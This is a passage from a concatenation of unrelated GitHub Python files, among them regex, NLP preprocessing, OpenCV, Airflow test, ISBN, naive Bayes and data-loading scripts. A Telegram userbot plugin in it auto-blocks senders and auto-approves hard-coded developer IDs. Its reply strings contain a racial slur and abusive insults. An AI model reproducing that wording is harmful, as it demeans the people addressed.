== '__main__':\n main()","repo_name":"billyean/pyEx","sub_path":"sd/walsh.py","file_name":"walsh.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41298575010","text":"'''this line of code searches for occurrences of '&&' or '||' in the user's input, where each operator is surrounded \r\nby spaces, and replaces them with 'and' or 'or', respectively. This operation is a way of humanizing or simplifying \r\nlogical expressions, making them more readable or user-friendly. 
For example, if the user enters \"A && B || C,\" \r\nthe code will replace it with \"A and B or C.\"'''\r\nimport re\r\n\r\n# Read the number of lines from the standard input\r\nnum_lines = int(input())\r\n\r\n# Loop through each line\r\nfor _ in range(num_lines):\r\n line = input()\r\n modified_line = re.sub(r'(?<= )(&&|\\|\\|)(?= )', lambda x: 'and' if x.group() == '&&' else 'or', line)\r\n print(modified_line)\r\n","repo_name":"tavi1402/Hackerrank_solutions","sub_path":"python solutions/regex_substitution.py","file_name":"regex_substitution.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35422762454","text":"\"\"\"\n\tPreprocessing utilities\n\"\"\"\nimport numpy as np\nimport emoticons_ES\nimport twokenize_ES\n\n\n\ndef load_corpus(train_path,test_path):\n\n\t# Load data Training\n\tprint(\"Loading Training data...\")\n\ttweets, target = load_data(train_path)\n\ttrainingPartitionLength = len(target)\n\t# Load data Testing\n\tprint(\"Loading Testing data...\")\n\ttweets_test, target_test = load_data(test_path)\n\n\tall_tweets = tweets+tweets_test\n\tall_target = target+target_test\n\t\n\t\n\tx, y, vocabulary = format_data(all_tweets,all_target)\n\n\treturn [x, y, vocabulary, trainingPartitionLength]\n\ndef load_data(path):\n\t\"\"\"\n\t\tLoad the tweets and labels from the data file in the path.\n\t\"\"\"\n\n\tf = open(path,'r');\n\n\ttweets = [];\n\ttarget = [];\n\tfor line in f :\n\t\tif line != '' and line != '\\n':\n\t\t\tlistLine = line.strip().split('\\t');\n\t\t\t\n\t\t\t#Tokenize tweet\n\t\t\tlistLine[0] = u\" \".join(twokenize_ES.tokenize(listLine[0]))\n\t\t\t\n\t\t\t#Analize tweet\n\t\t\tlistLine[0] = emoticons_ES.analyze_tweet(listLine[0])\n\t\t\t\n\t\t\t#RemovePunctuation\n\t\t\tlistLine[0] = u\" \".join(twokenize_ES.remove_punct(listLine[0]))\n\n\t\t\ttweets.append(listLine[0].strip().split());\n\t\t\tif listLine[1] == 'positive':\n\t\t\t\ttarget.append([1,0,0])\n\t\t\telif listLine[1] == 'negative':\n\t\t\t\ttarget.append([0,0,1])\n\t\t\telse:\n\t\t\t\ttarget.append([0,1,0])\n\n\treturn [tweets,target]\n\ndef format_data(tw,tar):\n\n\t#Calculate maxLength\n\tmaxLength = calculateMaxLength(tw)\n\t#Padding tweets...\n\tpadded_tweets = padding(tw, maxLength)\n\n\t#Building vocabulary\n\tvocabulary = build_vocabulary(padded_tweets)\n\n\t#Mapping words with values in the vocabulary\n\tx = np.array([[vocabulary[word] for word in t] for t in padded_tweets])\n\n\ty = np.array(tar)\n\n\treturn [x,y,vocabulary]\n\ndef padding(sentences, maxLength):\n\t\"\"\"\n\t\tForce all the sentences to be of the same length by filling with <PAD/>\n\t\"\"\"\n\t\n\tpadded_sentences = []\n\tfor i in range(len(sentences)):\n\t\ts = sentences[i]\n\t\tnPads = maxLength - len(s)\n\t\tnew_s = s + [\"<PAD/>\"]*nPads\n\t\tpadded_sentences.append(new_s)\t\n\n\treturn padded_sentences\n\ndef build_vocabulary(sentences):\n\t\"\"\"\n\t\tBuild a mapping between every word and \n\t\"\"\"\n\twords = []\n\tfor sentence in sentences:\n\t\tfor word in sentence:\n\t\t\twords.append(word)\n\twords = sorted(set(words))\n\tvocabulary = {x: i for i, x in enumerate(words)}\n\n\treturn vocabulary\n\ndef calculateMaxLength(sentences):\n\treturn max(len(s) for s in sentences)\n\n\n","repo_name":"VictorMMorant/arf-project","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} 
+{"seq_id":"38031284958","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\nfrom os.path import expanduser\n\nAUTHOR = 'Ranting Penguin'\nSITENAME = 'Ranting Penguins Rants'\nSITESUBTITLES = [ 'Ranting Penguins Rants', 'Full of optimism' ]\nSITEURL = 'https://rantingpenguin.github.io/blog/'\n\nPATH = 'content'\n\nTIMEZONE = 'Europe/Prague'\n\nDEFAULT_LANG = 'en'\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\nPLUGIN_PATHS = [expanduser('~/.local/share/pelican-plugins')]\nPLUGINS = ['asciidoc_reader']\n\nTHEME = expanduser(\"~/projects/ranting_penguin/pelican-themes/bold\")\n\n# Blogroll\nLINKS = ()\n#LINKS = (('Pelican', 'http://getpelican.com/'),\n# ('Python.org', 'http://python.org/'),\n# ('Jinja2', 'http://jinja.pocoo.org/'),\n# ('You can modify those links in your config file', '#'),)\n\n# Social widget\nSOCIAL = (('Twitter', 'https://twitter.com/ranting_penguin'),)\n#SOCIAL = (('You can add links in your config file', '#'),\n# ('Another social link', '#'),)\n\nDEFAULT_PAGINATION = 10\n\n# Uncomment following line if you want document-relative URLs when developing\nRELATIVE_URLS = True\n","repo_name":"RantingPenguin/blog","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30952173350","text":"import cv2 as cv\r\n\r\n\r\n# rescale function (img + vid + live vid)\r\ndef rescale_frame(frames, scale=0.75):\r\n width = int(frames.shape[1] * scale)\r\n height = int(frames.shape[0] * scale)\r\n\r\n dimensions = (width, height)\r\n\r\n return cv.resize(frames, dimensions, interpolation=cv.INTER_AREA)\r\n\r\n\r\n# rescale function (live vid)\r\ndef change_res(width, height):\r\n capture.set(3, width)\r\n capture.set(4, height)\r\n\r\n\r\n# Image\r\nimg = cv.imread('Images/cat_3_L.jpg')\r\ncv.imshow('cat_3_L', img)\r\n\r\nresized_image = rescale_frame(img)\r\ncv.imshow('Cat_3_L_resized', resized_image)\r\n\r\ncv.waitKey(0)\r\n\r\n\r\n# Video\r\ncapture = cv.VideoCapture('Vids/dog_v_1.mp4')\r\n\r\nwhile True:\r\n isTrue, frame = capture.read()\r\n\r\n frame_resized = rescale_frame(frame)\r\n\r\n cv.imshow('Video', frame)\r\n cv.imshow('Video_Resized', frame_resized)\r\n\r\n if cv.waitKey(20) & 0xFF == ord('d'):\r\n break\r\n\r\ncapture.release()\r\ncv.destroyAllWindows()\r\n","repo_name":"Panahda/Coding_DT","sub_path":"OpenCV_Course/rescale.py","file_name":"rescale.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3681881324","text":"import argparse\nimport yaml\n\nfrom dataclasses import dataclass\nfrom simpleclassifier.display import Display\nfrom simpleclassifier.factory import ClassifierFactory\nfrom simpleclassifier.factory import SplitterDatasetFactory\nfrom simpleclassifier.factory import SplitterFactory\nfrom simpleclassifier.profiler import Profiler\nfrom simpleclassifier.classifier_profiler import ClassifierProfiler\n\nfrom simpleclassifier.classifiers import * # noqa\nfrom simpleclassifier.splitter_datasets import * # noqa\nfrom simpleclassifier.splitters import * # noqa\n\n\n@dataclass\nclass Config:\n classifier_names: list[str]\n dataset_name: str\n splitting_strategy: str\n test_size: float\n profile_metrics: list[str]\n display_format: 
str\n\n\ndef main():\n    config = parse_args()\n\n    splitter = SplitterFactory.create_instance(config.splitting_strategy,\n                                               test_size=config.test_size)\n\n    dataset = SplitterDatasetFactory.create_instance(config.dataset_name,\n                                                     splitter=splitter)\n\n    classifiers = [\n        ClassifierFactory.create_instance(classifier_name, dataset=dataset)\n        for classifier_name in config.classifier_names\n    ]\n    profiler = Profiler(config.profile_metrics)\n    display = Display()\n    classifier_profiler = ClassifierProfiler(classifiers, profiler, display)\n\n    classifier_profiler.train()\n    classifier_profiler.profile_classifiers()\n    classifier_profiler.display_results(config.display_format)\n\n\ndef parse_args() -> Config:\n    parser = argparse.ArgumentParser(\n        \"simple classifier profiler\",\n        description=\"\"\"\nA simple program to easily train, test, profile, and compare different\nclassifiers on multiple datasets\"\"\",\n    )\n    parser.add_argument(\"-y\",\n                        \"--yml\",\n                        help=\"path to YAML configuration file\",\n                        required=True)\n    args = parser.parse_args()\n\n    try:\n        with open(args.yml, \"r\") as file:\n            data = yaml.load(file, Loader=yaml.FullLoader)\n            if data is None:\n                data = {}\n            return Config(\n                data.get(\"classifier_names\", []),\n                data.get(\"dataset_name\", \"breast_cancer\"),\n                data.get(\"splitting_strategy\") or \"percentage\",\n                data.get(\"test_size\") or 0.2,\n                data.get(\"profile_metrics\", [\"accuracy\"]),\n                data.get(\"display_format\", \"dump\"),\n            )\n    except FileNotFoundError:\n        print(f\"configuration file '{args.yml}' was not found\")\n        parser.print_usage()\n        parser.exit()\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"jayeshgaur/Python-Framework-for-Scalable-ML","sub_path":"simpleclassifier/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"73028067893","text":"# -*- coding: utf-8 -*-\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport unittest\n\nfrom airflow.ti_deps.deps.dagrun_exists_dep import DagrunRunningDep\nfrom fake_models import FakeDag, FakeTask, FakeTI\n\n\nclass DagrunRunningDepTest(unittest.TestCase):\n\n    def test_dagrun_doesnt_exist(self):\n        \"\"\"\n        Task instances without dagruns should fail this dep\n        \"\"\"\n        dag = FakeDag(running_dagruns=[], max_active_runs=1)\n        task = FakeTask(dag=dag)\n        ti = FakeTI(dagrun=None, task=task, dag_id=\"fake_dag\")\n\n        self.assertFalse(DagrunRunningDep().is_met(ti=ti, dep_context=None))\n\n    def test_dagrun_exists(self):\n        \"\"\"\n        Task instances with a dagrun should pass this dep\n        \"\"\"\n        dag = FakeDag(running_dagruns=[], max_active_runs=1)\n        task = FakeTask(dag=dag)\n        ti = FakeTI(dagrun=\"Fake Dagrun\", task=task, dag_id=\"fake_dag\")\n\n        self.assertTrue(DagrunRunningDep().is_met(ti=ti, 
dep_context=None))\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/apache_incubator-airflow/incubator-airflow-master/tests/ti_deps/deps/dagrun_exists_dep.py","file_name":"dagrun_exists_dep.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"73569219254","text":"import os\nimport time\nimport asyncio\nimport io\nimport userbot.plugins.sql_helper.pmpermit_sql as pmpermit_sql\nfrom telethon.tl.functions.users import GetFullUserRequest\nfrom telethon import events, errors, functions, types\nfrom userbot import ALIVE_NAME, CUSTOM_PMPERMIT\nfrom userbot.utils import admin_cmd\n\nPMPERMIT_PIC = os.environ.get(\"PMPERMIT_PIC\", None)\nif PMPERMIT_PIC is None:\n WARN_PIC = \"https://telegra.ph/file/196674fe4d58044289e71.jpg\"\nelse:\n WARN_PIC = PMPERMIT_PIC\n\nPM_WARNS = {}\nPREV_REPLY_MESSAGE = {}\n\n\nDEFAULTUSER = str(ALIVE_NAME) if ALIVE_NAME else \"Set ALIVE_NAME in config vars in Heroku\"\nCUSTOM_MIDDLE_PMP = str(CUSTOM_PMPERMIT) if CUSTOM_PMPERMIT else \"**If You Want You Can Send A Message Here ! My Boss Will Surely See And Reply To You After 2000 Years. !**\"\nUSER_BOT_WARN_ZERO = \"You Were \\n`╔══╗╔╗──────╔╗──────╔╗\\n║╔╗║║║──────║║──────║║\\n║╚╝╚╣║╔══╦══╣║╔╦══╦═╝║\\n║╔═╗║║║╔╗║╔═╣╚╝╣║═╣╔╗║\\n║╚═╝║╚╣╚╝║╚═╣╔╗╣║═╣╚╝║\\n╚═══╩═╩══╩══╩╝╚╩══╩══╝` \\nDue To Trying To Spam Inbox Of My Master !\"\nUSER_BOT_NO_WARN = (\"`Hello My Friend ! This is` **Mr. Techno**\\n\"\n \"THIS AREA IS OF MY MASTER SO OBEY THE RULES HERE.\"\n \"`Private Messaging Security`\\n\\n\"\n \"**Currently My Boss**\\n\"\n f\"{DEFAULTUSER} is Busy ! Please Don't Spam My BOSS's Inbox\\n\\n\"\n f\"{CUSTOM_MIDDLE_PMP} \\n\\n\"\n \"**Send** `/start` **If You Want To Register Your Request**\")\n\n\nif Var.PRIVATE_GROUP_ID is not None:\n @command(pattern=\"^.approve ?(.*)\")\n async def approve_p_m(event):\n if event.fwd_from:\n return\n replied_user = await event.client(GetFullUserRequest(event.chat_id))\n firstname = replied_user.user.first_name\n reason = event.pattern_match.group(1)\n chat = await event.get_chat()\n if event.is_private:\n if not pmpermit_sql.is_approved(chat.id):\n if chat.id in PM_WARNS:\n del PM_WARNS[chat.id]\n if chat.id in PREV_REPLY_MESSAGE:\n await PREV_REPLY_MESSAGE[chat.id].delete()\n del PREV_REPLY_MESSAGE[chat.id]\n pmpermit_sql.approve(chat.id, reason)\n await event.edit(\"Approved to PM MY Boss [{}](tg://user?id={})\".format(firstname, chat.id))\n await asyncio.sleep(3)\n await event.delete()\n\n\n @command(pattern=\"^.block ?(.*)\")\n async def approve_p_m(event):\n if event.fwd_from:\n return\n replied_user = await event.client(GetFullUserRequest(event.chat_id))\n firstname = replied_user.user.first_name\n reason = event.pattern_match.group(1)\n chat = await event.get_chat()\n if event.is_private:\n if chat.id == 1263617196:\n await event.edit(\"You bitch tried to block my Creator, now i will sleep for 100 seconds\")\n await asyncio.sleep(100)\n else:\n if pmpermit_sql.is_approved(chat.id):\n pmpermit_sql.disapprove(chat.id)\n await event.edit(\" ███████▄▄███████████▄ \\n▓▓▓▓▓▓█░░░░░░░░░░░░░░█\\n▓▓▓▓▓▓█░░░░░░░░░░░░░░█\\n▓▓▓▓▓▓█░░░░░░░░░░░░░░█\\n▓▓▓▓▓▓█░░░░░░░░░░░░░░█\\n▓▓▓▓▓▓█░░░░░░░░░░░░░░█\\n▓▓▓▓▓▓███░░░░░░░░░░░░█\\n██████▀▀▀█░░░░██████▀ \\n░░░░░░░░░█░░░░█ \\n░░░░░░░░░░█░░░█ \\n░░░░░░░░░░░█░░█ \\n░░░░░░░░░░░█░░█ \\n░░░░░░░░░░░░▀▀ \\n\\n**This is Uncool ! 
Now My boss Banned you nigga Due To backchodi 💩**[{}](tg://user?id={})\".format(firstname, chat.id))\n await asyncio.sleep(3)\n await event.client(functions.contacts.BlockRequest(chat.id))\n\n @command(pattern=\"^.disapprove ?(.*)\")\n async def approve_p_m(event):\n if event.fwd_from:\n return\n replied_user = await event.client(GetFullUserRequest(event.chat_id))\n firstname = replied_user.user.first_name\n reason = event.pattern_match.group(1)\n chat = await event.get_chat()\n if event.is_private:\n if chat.id == 813878981:\n await event.edit(\"Sorry, I Can't Disapprove My Master\")\n else:\n if pmpermit_sql.is_approved(chat.id):\n pmpermit_sql.disapprove(chat.id)\n await event.edit(\"Disapproved [{}](tg://user?id={})\".format(firstname, chat.id))\n \n \n\n @command(pattern=\"^.listapproved\")\n async def approve_p_m(event):\n if event.fwd_from:\n return\n approved_users = pmpermit_sql.get_all_approved()\n APPROVED_PMs = \"Current Approved PMs\\n\"\n if len(approved_users) > 0:\n for a_user in approved_users:\n if a_user.reason:\n APPROVED_PMs += f\"👉 [{a_user.chat_id}](tg://user?id={a_user.chat_id}) for {a_user.reason}\\n\"\n else:\n APPROVED_PMs += f\"👉 [{a_user.chat_id}](tg://user?id={a_user.chat_id})\\n\"\n else:\n APPROVED_PMs = \"no Approved PMs (yet)\"\n if len(APPROVED_PMs) > 4095:\n with io.BytesIO(str.encode(APPROVED_PMs)) as out_file:\n out_file.name = \"approved.pms.text\"\n await event.client.send_file(\n event.chat_id,\n out_file,\n force_document=True,\n allow_cache=False,\n caption=\"Current Approved PMs\",\n reply_to=event\n )\n await event.delete()\n else:\n await event.edit(APPROVED_PMs)\n\n\n @bot.on(events.NewMessage(incoming=True))\n async def on_new_private_message(event):\n if event.from_id == bot.uid:\n return\n\n if Var.PRIVATE_GROUP_ID is None:\n return\n\n if not event.is_private:\n return\n\n message_text = event.message.message\n chat_id = event.from_id\n\n current_message_text = message_text.lower()\n if USER_BOT_NO_WARN == message_text:\n # userbot's should not reply to other userbot's\n # https://core.telegram.org/bots/faq#why-doesn-39t-my-bot-see-messages-from-other-bots\n return\n sender = await bot.get_entity(chat_id)\n\n if chat_id == bot.uid:\n\n # don't log Saved Messages\n\n return\n\n if sender.bot:\n\n # don't log bots\n\n return\n\n if sender.verified:\n\n # don't log verified accounts\n\n return\n \n if any([x in event.raw_text for x in (\"/start\", \"1\", \"2\", \"3\", \"4\", \"5\")]):\n return\n\n if not pmpermit_sql.is_approved(chat_id):\n # pm permit\n await do_pm_permit_action(chat_id, event)\n\n async def do_pm_permit_action(chat_id, event):\n if chat_id not in PM_WARNS:\n PM_WARNS.update({chat_id: 0})\n if PM_WARNS[chat_id] == 5:\n r = await event.reply(USER_BOT_WARN_ZERO)\n await asyncio.sleep(3)\n await event.client(functions.contacts.BlockRequest(chat_id))\n if chat_id in PREV_REPLY_MESSAGE:\n await PREV_REPLY_MESSAGE[chat_id].delete()\n PREV_REPLY_MESSAGE[chat_id] = r\n the_message = \"\"\n the_message += \"#BLOCKED_PMs\\n\\n\"\n the_message += f\"[User](tg://user?id={chat_id}): {chat_id}\\n\"\n the_message += f\"Message Count: {PM_WARNS[chat_id]}\\n\"\n # the_message += f\"Media: {message_media}\"\n try:\n await event.client.send_message(\n entity=Var.PRIVATE_GROUP_ID,\n message=the_message,\n # reply_to=,\n # parse_mode=\"html\",\n link_preview=False,\n # file=message_media,\n silent=True\n )\n return\n except:\n return\n r = await event.client.send_file(event.chat_id, WARN_PIC, caption=USER_BOT_NO_WARN)\n PM_WARNS[chat_id] += 1\n 
if chat_id in PREV_REPLY_MESSAGE:\n            await PREV_REPLY_MESSAGE[chat_id].delete()\n        PREV_REPLY_MESSAGE[chat_id] = r\n\n\n@bot.on(events.NewMessage(incoming=True, from_users=(1263617196,536157487,554048138)))\nasync def hehehe(event):\n    if event.fwd_from:\n        return\n    chat = await event.get_chat()\n    if event.is_private:\n        if not pmpermit_sql.is_approved(chat.id):\n            pmpermit_sql.approve(chat.id, \"**My Boss Is Best🔥**\")\n            await borg.send_message(chat, \"**This User Is My Dev ! So Auto Approved !!!!**\")\n    \n","repo_name":"hellboi-atul/technouserbot","sub_path":"userbot/plugins/pmpermit.py","file_name":"pmpermit.py","file_ext":"py","file_size_in_byte":9427,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"30239078651","text":"def is_valid(isbn):\n    isbn = list(isbn.replace(\"-\", \"\"))\n    length=len(isbn)\n    if length==10: #isbn should have exactly 10 chars\n        for i in isbn[0:-1]: #checking till (len-1) as last char can be X\n            if str(i).isalpha():\n                return False\n        if isbn[-1] not in '0123456789':\n            if isbn[-1]!='X': \n                return False #if last char is not number and not X, isbn invalid\n            else:\n                isbn[-1]=10 #if last char is X, it is considered 10\n        code=0\n        for i,val in enumerate(isbn): \n            j=length-i\n            code+=(j*int(val)) #for 3-598-21508-8, code=(3*10+5*9+...+8*1)\n        if code%11==0:\n            return True\n    return False","repo_name":"divasriv/exercism-python","sub_path":"isbn-verifier/isbn_verifier.py","file_name":"isbn_verifier.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"25056465383","text":"from sklearn import naive_bayes as NB\r\nimport numpy as np\r\nimport feedparser\r\nimport pprint as pp\r\n\r\n\r\ndef textParse(bigString):\r\n    import re\r\n    listOfTokens = re.split(r'\\W+', bigString)\r\n    return [tok.lower() for tok in listOfTokens if len(tok) > 2]\r\n\r\ndef createVocabList(dataSet):\r\n    vocabSet = set([]) #create empty set\r\n    for document in dataSet:\r\n        vocabSet = vocabSet | set(document) #union of the two sets\r\n    return list(vocabSet)\r\n\r\ndef calcMostFreq(vocabList,fullText,topwordNum):\r\n    import operator\r\n    freqDict = {}\r\n    for token in vocabList:\r\n        freqDict[token]=fullText.count(token)\r\n    sortedFreq = sorted(freqDict.items(), key=operator.itemgetter(1), reverse=True)\r\n    return sortedFreq[:topwordNum]\r\n\r\ndef bagOfWords2VecMN(vocabList, inputSet):\r\n    returnVec = [0]*len(vocabList)\r\n    for word in inputSet:\r\n        if word in vocabList:\r\n            returnVec[vocabList.index(word)] += 1\r\n    return returnVec\r\n\r\ndef localWords(feed1,feed0,topwordNum):\r\n    docList=[]\r\n    classList = []\r\n    fullText =[]\r\n    minLen = min(len(feed1['entries']),len(feed0['entries']))\r\n    for i in range(minLen):\r\n        wordList = textParse(feed1['entries'][i]['summary'])\r\n        docList.append(wordList)\r\n        fullText.extend(wordList)\r\n        classList.append(1)\r\n\r\n        wordList = textParse(feed0['entries'][i]['summary'])\r\n        docList.append(wordList)\r\n        fullText.extend(wordList)\r\n        classList.append(0)\r\n\r\n    vocabList = createVocabList(docList)\r\n    topWords = calcMostFreq(vocabList,fullText,topwordNum)\r\n    for pairW in topWords:\r\n        if pairW[0] in vocabList:\r\n            vocabList.remove(pairW[0])\r\n    trainingSet = list(range(2*minLen))\r\n    testSet=[]\r\n    for i in range(int(len(trainingSet) * 0.25)):\r\n        randIndex = 
int(np.random.uniform(0,len(trainingSet)))\r\n testSet.append(trainingSet[randIndex])\r\n del(trainingSet[randIndex])\r\n x_train=[]\r\n y_train = []\r\n x_test = []\r\n y_test = []\r\n for docIndex in trainingSet:\r\n x_train.append(bagOfWords2VecMN(vocabList, docList[docIndex]))\r\n y_train.append(classList[docIndex])\r\n for docIndex in testSet:\r\n x_test.append(bagOfWords2VecMN(vocabList, docList[docIndex]))\r\n y_test.append(classList[docIndex])\r\n\r\n\r\n gnb = NB.GaussianNB()\r\n # bnb = NB.BernoulliNB()\r\n # mnb = NB.MultinomialNB()\r\n y_predict = gnb.fit(x_train, y_train).predict(x_test)\r\n return (y_predict != y_test).sum()\r\n\r\nif __name__ == '__main__':\r\n\r\n # UKJinRong = feedparser.parse('http://www.ftchinese.com/rss/feed') # 100\r\n # wineworld = feedparser.parse('http://www.wine-world.com/articlerss/rss.aspx') # 75\r\n nasa = feedparser.parse('http://www.nasa.gov/rss/dyn/image_of_the_day.rss') # 60\r\n zhihuMeiRi = feedparser.parse('https://www.zhihu.com/rss') # 60\r\n # toutiao = feedparser.parse('http://news.163.com/special/00011K6L/rss_newstop.xml') # 50\r\n # weifeng = feedparser.parse('http://news.feng.com/rss.xml') # 40\r\n # caijingZhoukan = feedparser.parse('http://blog.163.com/cbn.weekly/rss/') # 40\r\n # geekpark = feedparser.parse('http://www.geekpark.net/rss') # 30\r\n # yahoo = feedparser.parse('http://sports.yahoo.com/nba/teams/hou/rss.xml') # 15\r\n # nature = feedparser.parse('http://feeds.nature.com/news/rss/most_recent') # 15\r\n # cnblog = feedparser.parse('http://feed.cnblogs.com/blog/u/161528/rss') # 10\r\n # matrix67 = feedparser.parse('http://www.matrix67.com/blog/feed') # 10\r\n # chaijinSina = feedparser.parse('http://blog.sina.com.cn/rss/1219548027.xml') # 10\r\n\r\n\r\n\r\n\r\n for _ in range(100):\r\n errors = localWords(nasa, zhihuMeiRi,0)\r\n print(errors)\r\n print(errors/float(30))","repo_name":"RavInHessianMatx/ML","sub_path":"SciKit-LearnProject/NaiveBayes/sampleFromMLinAct.py","file_name":"sampleFromMLinAct.py","file_ext":"py","file_size_in_byte":3996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74031766454","text":"import h5py\nimport datetime\n\ndef decode_time_steps(time_steps):\n new_time_steps = []\n for step in time_steps:\n new_time_steps.append(step.decode('utf-8'))\n return new_time_steps\n\n\ndef load_data():\n filename = 'R:/vkr2/fastapi\\dao\\BJ13_M32x32_T30_InOut.h5'\n with h5py.File(filename, 'r') as file:\n dataset_name = 'data'\n time_steps_name = 'date'\n dataset = file[dataset_name][:]\n time_steps = file[time_steps_name][:]\n return dataset, decode_time_steps(time_steps)\n\n\ndef get_one_shot(datetime: str):\n data, time_steps = load_data()\n idx = 0\n if datetime.encode('utf-8') in time_steps:\n for step in time_steps:\n if step.decode('utf-8') == datetime:\n break\n idx += 1\n else:\n return \"No data\"\n one_data = data[idx]\n\n inflow = one_data[0]\n outflow = one_data[1]\n\n return inflow, outflow\n\n\ndef check_miss_data():\n dataset, time_steps = load_data()\n start = time_steps[0][:8]\n end = time_steps[len(time_steps)-1][:8]\n start_date = datetime.datetime.strptime(start, \"%Y%m%d\")\n end_date = datetime.datetime.strptime(end, \"%Y%m%d\")\n missing_dates = []\n partial_dates = []\n complete_dates = []\n\n for d in range((end_date - start_date).days + 1):\n date = start_date + datetime.timedelta(days=d)\n date_str = date.strftime(\"%Y%m%d\")\n date_steps = [step for step in time_steps if step.startswith(date_str)]\n if not date_steps:\n 
missing_dates.append(date_str)\n elif len(date_steps) < 48:\n partial_dates.append(date_str)\n else:\n complete_dates.append(date.strftime(\"%Y-%m-%d\"))\n\n return complete_dates\n\n\ndef load_weather():\n filename = 'R:/vkr2/fastapi\\dao\\BJ_Meteorology.h5'\n with h5py.File(filename, 'r') as file:\n temp = file['Temperature'][:]\n weather = file['Weather'][:]\n wind = file['WindSpeed'][:]\n time_steps = decode_time_steps(file['date'][:])\n\n all_weather = {\n 'date': time_steps,\n 'temperature': temp,\n 'wind': wind,\n 'weather': weather\n }\n return all_weather\n\n\ndef convert_weather_type(weather_array):\n weather_types = {0: 'Sunny',\n 1: 'Cloudy',\n 2: 'Overcast',\n 3: 'Rainy',\n 4: 'Sprinkle',\n 5: 'ModerateRain',\n 6: 'HeavyRain',\n 7: 'Rainstorm',\n 8: 'Thunderstorm',\n 9: 'FreezingRain',\n 10: 'Snowy',\n 11: 'LightSnow',\n 12: 'ModerateSnow',\n 13: 'HeavySnow',\n 14: 'Foggy',\n 15: 'Sandstorm',\n 16: 'Dusty'}\n w = 1\n if w in weather_array:\n return weather_types[list(weather_array).index(w)]\n\n\ndef get_weather(datetime: str):\n weather = load_weather()\n time_steps = weather['date']\n idx = 0\n if datetime in time_steps:\n for step in time_steps:\n if step == datetime:\n break\n idx += 1\n else:\n return \"No data\"\n\n this_weather = {\n 'temperature': weather['temperature'][idx],\n 'wind': weather['wind'][idx],\n 'weather': convert_weather_type(weather['weather'][idx])\n }\n\n return this_weather\n\ndef load_events():\n filename = 'R:/vkr2/fastapi\\dao\\BJ_Holiday.txt'\n events = []\n with open(filename, 'r') as file:\n for event in file:\n events.append(event.strip())\n return events\n\ndef get_events(datetime:str):\n events = load_events()\n if datetime[:8] in events:\n return True\n return False\n\n\n","repo_name":"ratmeow/VKR","sub_path":"testik.py","file_name":"testik.py","file_ext":"py","file_size_in_byte":3785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15924197751","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.cm as cm\r\nimport cmath\r\nimport time\r\n\r\n\r\ndef julia_set(c):\r\n # Initialise an empty array (corresponding to pixels)\r\n julia = np.zeros((x_res, y_res))\r\n\r\n # Loop over each pixel\r\n for ix in range(x_res):\r\n for iy in range(y_res):\r\n # Map pixel position to a point in the complex plane\r\n z = complex(ix / x_res * width + xmin, iy / y_res * height + ymin)\r\n # Iterate\r\n iteration = 0\r\n while abs(z) <= z_abs_max and iteration < max_iter:\r\n z = z ** 2 + c\r\n iteration += 1\r\n\r\n iteration_ratio = iteration / max_iter\r\n # Set the pixel value to be equal to the iteration_ratio\r\n julia[iy, -ix] = iteration_ratio\r\n\r\n # Plot the array using matplotlib's imshow\r\n fig, ax = plt.subplots()\r\n ax.imshow(julia, interpolation='bilinear')\r\n plt.axis()\r\n plt.show()\r\n\r\n\r\n# Program starting\r\nprint('Hi Welcome to the Julia Set Program. 
